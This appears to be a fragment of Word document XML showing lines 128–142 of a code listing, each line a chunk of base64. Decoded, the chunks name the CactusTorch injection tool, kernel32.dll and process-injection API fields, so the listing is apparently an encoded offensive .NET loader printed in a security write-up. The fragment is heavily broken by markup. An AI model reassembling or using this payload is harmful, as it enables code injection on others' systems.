        <w:t>"cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>W"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRya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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WJ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5V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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HJ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>h"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>130</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0c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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>z"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>133</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtY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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>134</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>I"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3Rya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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>W5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>D"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>z"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0d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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>J"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAb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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>T"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVud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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
